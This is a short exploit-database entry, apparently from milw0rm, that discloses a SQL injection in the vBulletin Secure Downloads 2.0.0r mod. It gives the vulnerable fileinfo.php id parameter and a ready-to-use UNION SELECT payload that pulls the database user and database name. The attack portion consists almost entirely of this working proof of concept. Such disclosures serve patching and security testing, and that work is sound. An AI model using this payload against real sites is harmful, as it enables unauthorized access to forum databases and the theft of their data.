EXPLOITS

vBulletin Secure Downloads 2.0.0r - SQL Injection

Author: Cnaph
type: webapps
platform: php
port: 
date_added: 2008-12-07  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7385.txt  

[~] vBulletin (Mode Secure Downloads v2.0.0r) SQL Injection Vulnerability

[~] Mod : http://www.1src.com/freeware/download.php?id=1880

[~] Author : Cn4phux

[~] PoC :



[~] URL.com/fileinfo.php?id=[SQL]


[~] : 1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0


//Cn4phux.

# milw0rm.com [2008-12-08]